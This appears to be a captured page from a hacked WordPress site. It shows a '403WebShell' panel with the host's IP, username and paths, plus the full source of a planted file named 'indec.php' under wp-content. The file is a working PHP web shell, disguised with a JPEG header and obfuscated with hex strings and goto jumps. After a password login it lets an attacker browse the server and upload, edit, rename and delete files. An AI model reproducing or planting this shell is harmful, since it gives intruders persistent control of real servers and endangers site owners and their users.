????JFIF??x?x????'403WebShell
403Webshell
Server IP : 172.67.174.47  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /././home/./tempvsty/pontiacques.org/wp-content/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /././home/./tempvsty/pontiacques.org/wp-content/indec.php
<?php goto NLnKLsvYFH;
NLnKLsvYFH:
$password =
    "\x30\x61\x39\x31\x65\x63\x37\x38\x61\x32\x63\x62\x38\x65\x38\x30\x38\x38\x39\x35\x62\x35\x61\x36\x30\x61\x64\x65\x36\x63\x31\x64";
error_reporting(0);
set_time_limit(0);
session_start();
if (isset($_SESSION["\x6c\x6f\x67\x67\145\144\157\x6b\x6d"])) {#loggedokm
    goto DqqOhzX5B0;
}
goto u3NT7x2QrJ;
u3NT7x2QrJ:
$_SESSION["\x6c\x6f\147\x67\x65\144\157\153\x6d"] = false;
DqqOhzX5B0:
if (!isset($_POST["\160\x61\x73\163\x77\x6f\x72\x64"])) { #password
    goto pb73Ufbn0o;
}
if (!(md5($_POST["\160\x61\x73\163\x77\157\x72\144"]) == $password)) {
    goto mr5E2rLws5;
}
$_SESSION["\x6c\x6f\x67\x67\145\x64\x6f\153\155"] = md5(
    $_POST["\160\141\x73\163\x77\x6f\x72\x64"]
);
goto SjaSVtI46I;
SjaSVtI46I:
mr5E2rLws5:
pb73Ufbn0o:
if (
    !(
        !$_SESSION["\154\157\x67\x67\145\x64\157\x6b\155"] ||
        $_SESSION["\x6c\x6f\x67\147\x65\x64\x6f\x6b\155"] != $password
    )
) {
    goto EXNN3Tp2rS;
}
echo "\xd\xa\74\x68\164\x6d\154\76\74\150\145\x61\x64\76\74\x74\x69\164\154\145\x3e\40\74\x2f\164\x69\x74\x6c\x65\76\x3c\57\150\145\x61\144\x3e\xd\12\40\40\x3c\x62\x6f\144\x79\76\xd\xa\x20\x20\x20\x20\x3c\x70\40\x61\x6c\x69\x67\156\x3d\x22\143\x65\x6e\x74\x65\x72\42\x3e\74\143\145\x6e\164\145\162\x3e\74\x66\157\x6e\164\40\163\x74\171\x6c\145\x3d\x22\x66\x6f\156\164\x2d\x73\151\x7a\x65\72\x31\63\x70\170\x22\40\143\157\154\x6f\162\75\x22\43\x66\x64\145\x36\x63\144\42\x20\x66\x61\143\145\75\x22\x22\x3e\15\12\x20\40\40\x20\74\146\x6f\x72\x6d\x20\155\x65\x74\x68\x6f\x64\75\x22\x70\x6f\x73\x74\42\76\15\xa\40\40\x20\x20\x20\x20\74\151\x6e\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\x70\x61\x73\x73\167\157\x72\144\42\x20\156\x61\155\x65\75\42\x70\x61\x73\x73\x77\x6f\162\144\42\76\xd\12\40\x20\40\x20\x20\x20\x3c\151\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\x6d\x69\x74\x22\40\156\141\155\145\75\42\163\165\x62\x6d\x69\164\42\40\x76\141\x6c\165\145\x3d\x22\x20\x20\x3e\76\x22\x3e\15\xa\x20\x20\40\40\74\57\x66\x6f\162\155\76\15\12\x20\x20\74\57\x62\x6f\x64\171\76\xd\12\74\x2f\x68\164\x6d\x6c\x3e\15\xa\15\xa";
exit();
goto ocC9gxzse4;
ocC9gxzse4:
EXNN3Tp2rS:
?>  <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>000</title>    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"        integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"        integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="        crossorigin="anonymous" referrerpolicy="no-referrer" /></head><body>    <?php
   function formatSizeUnits($bytes)
   {
       if ($bytes >= 1073741824) {
           $bytes = number_format($bytes / 1073741824, 2) . " GB";
       } elseif ($bytes >= 1048576) {
           $bytes = number_format($bytes / 1048576, 2) . " MB";
       } elseif ($bytes >= 1024) {
           $bytes = number_format($bytes / 1024, 2) . " KB";
       } elseif ($bytes > 1) {
           $bytes = $bytes . " bytes";
       } elseif ($bytes == 1) {
           $bytes = $bytes . " byte";
       } else {
           $bytes = "0 bytes";
       }
       return $bytes;
   }
   function fileExtension($file)
   {
       return substr(strrchr($file, "."), 1);
   }
   function fileIcon($file)
   {
       $imgs = [
           "apng",
           "avif",
           "gif",
           "jpg",
           "jpeg",
           "jfif",
           "pjpeg",
           "pjp",
           "png",
           "svg",
           "webp",
       ];
       $audio = ["wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"];
       $ext = strtolower(fileExtension($file));
       if ($file == "error_log") {
           return '<i class="fa-sharp fa-solid fa-bug"></i> ';
       } elseif ($file == ".htaccess") {
           return '<i class="fa-solid fa-hammer"></i> ';
       }
       if ($ext == "html" || $ext == "htm") {
           return '<i class="fa-brands fa-html5"></i> ';
       } elseif ($ext == "php" || $ext == "phtml") {
           return '<i class="fa-brands fa-php"></i> ';
       } elseif (in_array($ext, $imgs)) {
           return '<i class="fa-regular fa-images"></i> ';
       } elseif ($ext == "css") {
           return '<i class="fa-brands fa-css3"></i> ';
       } elseif ($ext == "txt") {
           return '<i class="fa-regular fa-file-lines"></i> ';
       } elseif (in_array($ext, $audio)) {
           return '<i class="fa-duotone fa-file-music"></i> ';
       } elseif ($ext == "py") {
           return '<i class="fa-brands fa-python"></i> ';
       } elseif ($ext == "js") {
           return '<i class="fa-brands fa-js"></i> ';
       } else {
           return '<i class="fa-solid fa-file"></i> ';
       }
   }
   function encodePath($path)
   {
       $a = ["/", "\\", ".", ":"];
       $b = ["ক", "খ", "গ", "ঘ"];
       return str_replace($a, $b, $path);
   }
   function decodePath($path)
   {
       $a = ["/", "\\", ".", ":"];
       $b = ["ক", "খ", "গ", "ঘ"];
       return str_replace($b, $a, $path);
   }
   $root_path = __DIR__;
   if (isset($_GET["p"])) {
       if (empty($_GET["p"])) {
           $p = $root_path;
       } elseif (!is_dir(decodePath($_GET["p"]))) {
           echo "<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>";
       } elseif (is_dir(decodePath($_GET["p"]))) {
           $p = decodePath($_GET["p"]);
       }
   } elseif (isset($_GET["q"])) {
       if (!is_dir(decodePath($_GET["q"]))) {
           echo "<script>window.location.replace('?p=');</script>";
       } elseif (is_dir(decodePath($_GET["q"]))) {
           $p = decodePath($_GET["q"]);
       }
   } else {
       $p = $root_path;
   }
   define("PATH", $p);
   echo '<nav class="navbar navbar-light" style="background-color: #fdcdf9;">  <div class="navbar-brand">  <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a>';
   $path = str_replace("\\", "/", PATH);
   $paths = explode("/", $path);
   foreach ($paths as $id => $dir_part) {
       if ($dir_part == "" && $id == 0) {
           $a = true;
           echo "<a href=\"?p=/\">/</a>";
           continue;
       }
       if ($dir_part == "") {
           continue;
       }
       echo "<a href='?p=";
       for ($i = 0; $i <= $id; $i++) {
           echo str_replace(":", "ঘ", $paths[$i]);
           if ($i != $id) {
               echo "ক";
           }
       }
       echo "'>" . $dir_part . "</a>/";
   }
   echo '</div><div class="form-inline"><a href="?upload&q=' .
       urlencode(encodePath(PATH)) .
       '"><button class="btn btn-dark" type="button">Upload File</button></a><a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div></nav>';
   if (isset($_GET["p"])) {
       if (is_readable(PATH)) {
           $fetch_obj = scandir(PATH);
           $folders = [];
           $files = [];
           foreach ($fetch_obj as $obj) {
               if ($obj == "." || $obj == "..") {
                   continue;
               }
               $new_obj = PATH . "/" . $obj;
               if (is_dir($new_obj)) {
                   array_push($folders, $obj);
               } elseif (is_file($new_obj)) {
                   array_push($files, $obj);
               }
           }
       }
       echo '<table class="table table-hover">  <thead>    <tr>      <th scope="col">Name</th>      <th scope="col">Size</th>      <th scope="col">Modified</th>      <th scope="col">Perms</th>      <th scope="col">Actions</th>    </tr>  </thead>  <tbody>';
       foreach ($folders as $folder) {
           echo "    <tr>      <td><i class='fa-solid fa-folder'></i> <a href='?p=" .
               urlencode(encodePath(PATH . "/" . $folder)) .
               "'>" .
               $folder .
               "</a></td>      <td><b>---</b></td>      <td>" .
               date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) .
               "</td>      <td>0" .
               substr(decoct(fileperms(PATH . "/" . $folder)), -3) .
               "</a></td>      <td>      <a title='Rename' href='?q=" .
               urlencode(encodePath(PATH)) .
               "&r=" .
               $folder .
               "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>      <a title='Delete' href='?q=" .
               urlencode(encodePath(PATH)) .
               "&d=" .
               $folder .
               "'><i class='fa fa-trash' aria-hidden='true'></i></a>      <td>    </tr>";
       }
       foreach ($files as $file) {
           echo "    <tr>          <td>" .
               fileIcon($file) .
               $file .
               "</td>          <td>" .
               formatSizeUnits(filesize(PATH . "/" . $file)) .
               "</td>          <td>" .
               date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) .
               "</td>          <td>0" .
               substr(decoct(fileperms(PATH . "/" . $file)), -3) .
               "</a></td>          <td>          <a title='Edit File' href='?q=" .
               urlencode(encodePath(PATH)) .
               "&e=" .
               $file .
               "'><i class='fa-solid fa-file-pen'></i></a>          <a title='Rename' href='?q=" .
               urlencode(encodePath(PATH)) .
               "&r=" .
               $file .
               "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>          <a title='Delete' href='?q=" .
               urlencode(encodePath(PATH)) .
               "&d=" .
               $file .
               "'><i class='fa fa-trash' aria-hidden='true'></i></a>          <td>    </tr>";
       }
       echo "  </tbody></table>";
   } else {
       if (empty($_GET)) {
           echo "<script>window.location.replace('?p=');</script>";
       }
   }
   if (isset($_GET["upload"])) {
       echo '    <form method="post" enctype="multipart/form-data">        Select file to upload:        <input type="file" name="fileToUpload" id="fileToUpload">        <input type="submit" class="btn btn-dark" value="Upload" name="upload">    </form>';
   }
   if (isset($_GET["r"])) {
       if (!empty($_GET["r"]) && isset($_GET["q"])) {
           echo '    <form method="post">        Rename:        <input type="text" name="name" value="' .
               $_GET["r"] .
               '">        <input type="submit" class="btn btn-dark" value="Rename" name="rename">    </form>';
           if (isset($_POST["rename"])) {
               $name = PATH . "/" . $_GET["r"];
               if (rename($name, PATH . "/" . $_POST["name"])) {
                   echo "<script>alert('Renamed.'); window.location.replace('?p=" .
                       encodePath(PATH) .
                       "');</script>";
               } else {
                   echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                       encodePath(PATH) .
                       "');</script>";
               }
           }
       }
   }
   if (isset($_GET["e"])) {
       if (!empty($_GET["e"]) && isset($_GET["q"])) {
           echo '    <form method="post">        <textarea style="height: 500px;        width: 90%;" name="data">' .
               htmlspecialchars(file_get_contents(PATH . "/" . $_GET["e"])) .
               '</textarea>        <br>        <input type="submit" class="btn btn-dark" value="Save" name="edit">    </form>';
           if (isset($_POST["edit"])) {
               $filename = PATH . "/" . $_GET["e"];
               $data = $_POST["data"];
               $open = fopen($filename, "w");
               if (fwrite($open, $data)) {
                   echo "<script>alert('Saved.'); window.location.replace('?p=" .
                       encodePath(PATH) .
                       "');</script>";
               } else {
                   echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                       encodePath(PATH) .
                       "');</script>";
               }
               fclose($open);
           }
       }
   }
   if (isset($_POST["upload"])) {
       $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"];
       if (
           move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)
       ) {
           echo "<p>" .
               htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) .
               " has been uploaded.</p>";
       } else {
           echo "<p>Sorry, there was an error uploading your file.</p>";
       }
   }
   if (isset($_GET["d"]) && isset($_GET["q"])) {
       $name = PATH . "/" . $_GET["d"];
       if (is_file($name)) {
           if (unlink($name)) {
               echo "<script>alert('File removed.'); window.location.replace('?p=" .
                   encodePath(PATH) .
                   "');</script>";
           } else {
               echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                   encodePath(PATH) .
                   "');</script>";
           }
       } elseif (is_dir($name)) {
           if (rmdir($name) == true) {
               echo "<script>alert('Directory removed.'); window.location.replace('?p=" .
                   encodePath(PATH) .
                   "');</script>";
           } else {
               echo "<script>alert('Some error occurred.'); window.location.replace('?p=" .
                   encodePath(PATH) .
                   "');</script>";
           }
       }
   }
   ?>    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"        integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"        crossorigin="anonymous"></script></body></html>

Youez - 2016 - github.com/yon3zu
LinuXploit